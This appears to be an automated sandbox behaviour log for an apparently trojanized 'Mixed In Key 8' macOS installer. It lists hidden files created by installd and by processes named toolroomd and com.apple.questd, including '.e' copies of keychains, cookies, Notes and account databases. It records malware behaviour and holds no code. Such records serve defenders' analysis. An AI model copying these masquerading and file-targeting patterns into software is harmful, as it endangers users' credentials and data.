              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/.BC.D_Dxr7ND -> Versions/Current/TagLibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/.BC.D_FkTll9 -> Versions/Current/PrivateHeadersJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/.BC.D_pllbJ3 -> Versions/Current/ResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/.BC.D_DrF1Nc -> AJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/.BC.D_KoEHgP -> Versions/Current/HeadersJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/.BC.D_jks6fe -> AJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/.BC.D_GmcIt9 -> Versions/Current/HeadersJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/.BC.D_bPfe2j -> Versions/Current/ModulesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/.BC.D_eZr2hy -> Versions/Current/DanceabilityAudioEngineJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/.BC.D_4UJmYO -> Versions/Current/ResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/.BC.D_FfVqha -> AJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/.BC.D_7qn63h -> Versions/Current/ResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/.BC.D_kSuooF -> AJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/.BC.D_rxVqoI -> Versions/Current/MIKAudioJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/install_monitor (PID: 749)Hidden File created: /var/db/.dat.nosync02ed.qXMjdOJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/install_monitor (PID: 749)Hidden File moved: /var/db/.dat.nosync02ed.qXMjdO -> /var/db/.InstallerTMExcludes.plistJump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Hidden File created: /Users/ben/Library/.O6a3uE2h3Jump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Hidden File created: /Users/ben/.ncspotJump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.lsm_map.eJump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.lsm_map.eJump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.lsm_map.eJump to behavior
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /var/root/Library/.FNm8T2eKL
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /var/root/.ncspot
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/..CFUserTextEncoding.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/.bash_sessions/.EBE6D3A3-8F8E-4F5E-A314-627FCC8C6C15.historynew.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/.bash_sessions/.EBE6D3A3-8F8E-4F5E-A314-627FCC8C6C15.history.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Public/..com.apple.timemachine.supported.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Assistant/.sync_flagcom.apple.maps.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.configurator.ui.commerce.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.metadata.SpotlightNetHelper.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.CallHistorySyncHelper.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.calculateframework.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.madrid.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.CoreGraphics.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.classroom.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.KeyboardViewer.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.coreauthd.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.driver.AppleBluetoothMultitouch.mouse.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.adobe.crashreporter.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.helpd.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.dock.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.commerce.spotlight.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.iBooksX.commerce.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.commerce.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.coreservices.useractivityd.dynamicuseractivites.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.corespotlightui.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.wifi.keychain-format.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.commcenter.carrier_bundle.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.dock.plist.3aWGAHw.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.siri.context.service.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.commerce.knownclients.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.microsoft.autoupdate2.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.CommCenter.counts.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.cloudpaird.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.homed.notbackedup.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.Messages.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.textInput.keyboardServices.textReplacement.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.security.cloudkeychainproxy3.keysToRegister.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.commerce.configurator.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.commcenter.device_specific_nobackup.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.CharacterPicker.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.commerce.safari.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.coreservices.uiagent.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.HIToolbox.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.appstore.commerce.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.PubSubAgent.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.cloudd.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/.com.apple.Maps.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/HomeKit/.plain-metadata.config.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/HomeKit/.datastore.sqlite.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/HomeKit/.datastore.sqlite-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/HomeKit/.datastore.sqlite-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Keychains/.login.keychain-db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Keychains/.login.keychain.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/FontCollections/.Fixed Width.collection.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/FontCollections/.Fun.collection.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/FontCollections/.Traditional.collection.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/FontCollections/.Modern.collection.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/FontCollections/.Web.collection.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/FontCollections/.PDF.collection.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Accounts/.Accounts3.sqlite.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Accounts/.Accounts4.sqlite.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Accounts/.Accounts4.sqlite-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Accounts/.Accounts4.sqlite-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Accounts/.Accounts3.sqlite-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Accounts/.Accounts3.sqlite-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Cookies/.com.apple.spotlight.cookies.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Cookies/.com.apple.safari.cookies.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/.com.apple.mobilenotes.persistentstoreopen.lock.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/.com.apple.preferencepanes.cache.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Pictures/Photos Library.photoslibrary/resources/..metadata_never_index.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Pictures/Photos Library.photoslibrary/private/..metadata_never_index.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/com.apple.spotlight/.appList.dat.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/CallHistoryDB/.com.apple.callhistory.databaseInfo.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/JREInstaller/.JREInstallLog.txt.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Saved Application State/com.apple.finder.savedState/.window_1.data.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Saved Application State/com.apple.finder.savedState/.data.data.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Saved Application State/net.java.openjdk.cmd.savedState/.windows.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Saved Application State/net.java.openjdk.cmd.savedState/.data.data.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Saved Application State/net.java.openjdk.cmd.savedState/.restorecount.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/7C0AB787-231F-4589-A778-D020F80743CC.calendar/.Info.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/80F5EE42-BD13-4C76-AF7B-D5B67DB0982D.calendar/.Info.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/E380CE29-FC53-41B4-8274-342A10683565.calendar/.Info.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/5E432E28-F43A-4F44-ADCE-9ACE5FAB134F.calendar/.Info.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/5DA11817-A917-4E66-9D7D-7C3E0F9DE223.calendar/.Info.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/E57CDCEE-89E5-476A-9037-A6D973A76488.calendar/.Info.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Calendars/438451CB-2554-4C3A-8B26-D0D56E4F2EC5.calendar/.Info.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/ByHost/.com.apple.ManagedClient.FB2C97C6-63F5-5D81-A93F-BA4895BD7046.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/ByHost/.com.apple.coreservices.appleidauthenticationinfo.FB2C97C6-63F5-5D81-A93F-BA4895BD7046.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/ByHost/.com.apple.dock.FB2C97C6-63F5-5D81-A93F-BA4895BD7046.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Preferences/ByHost/.com.apple.commcenter.csidata.FB2C97C6-63F5-5D81-A93F-BA4895BD7046.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/LanguageModeling/en-dynamic.lm/.meta.dat.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/LanguageModeling/en-dynamic.lm/.lexicon.dat.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/LanguageModeling/en-dynamic.lm/.tags.dat.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/LanguageModeling/en-dynamic.lm/.dynamic.dat.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/LanguageModeling/de-dynamic.lm/.meta.dat.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/LanguageModeling/de-dynamic.lm/.lexicon.dat.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/LanguageModeling/de-dynamic.lm/.tags.dat.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/LanguageModeling/de-dynamic.lm/.dynamic.dat.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/LocalStorage/.https_www.google.com_0.localstorage-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/LocalStorage/.https_www.oracle.com_0.localstorage-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/LocalStorage/.https_www.google.com_0.localstorage-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/LocalStorage/.http_www.faronics.com_0.localstorage.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/LocalStorage/.https_www.oracle.com_0.localstorage-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/LocalStorage/.https_www.apple.com_0.localstorage-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/LocalStorage/.https_www.apple.com_0.localstorage-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/LocalStorage/.https_java.com_0.localstorage.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/LocalStorage/.https_www.oracle.com_0.localstorage.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/LocalStorage/.https_www.google.com_0.localstorage.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Safari/LocalStorage/.https_www.apple.com_0.localstorage.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/PubSub/Database/.Database.sqlite3.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Group Containers/group.com.apple.notes/.NoteStore.sqlite-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Group Containers/group.com.apple.notes/.NoteStore.sqlite-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Group Containers/group.com.apple.notes/.NoteStore.sqlite.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.CloudPhotosConfiguration/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.iCal.CalendarNC/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.calculator/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.siri.media-indexer/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.cloudphotosd/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.Maps/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.CalendarNotification.CalNCService/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.Notes.HTMLConverter/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.Home/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.Safari.CacheDeleteExtension/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.AddressBook.ContactsAccountsService/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.MediaLibraryService/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.CloudDocs.MobileDocumentsFileProvider/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.mail/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.DataDetectorsLocalSources/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.MailCacheDelete/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.CalendarAgent/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.Chess/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.DataDetectorsDynamicData/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.quicklook.ui.helper/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.CalendarAgent.CalNCService/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.iBooksX.CacheDelete/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Containers/com.apple.mediaanalysisd/.Container.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/.CSHelpIndex.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/.Cache.db-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/.Cache.db-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/.Cache.db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/.HelpCache.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.CommerceKit.TransactionService/.Cache.db-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.CommerceKit.TransactionService/.Cache.db-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.CommerceKit.TransactionService/.Cache.db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.commerce.spotlight/.SpotlightLibrary.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.KeyboardViewer/.Cache.db-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.KeyboardViewer/.Cache.db-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.KeyboardViewer/.Cache.db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/.Cache.db-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/.Cache.db-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/.Cache.db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.keyboardservicesd/.Cache.db-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.keyboardservicesd/.Cache.db-wal.e
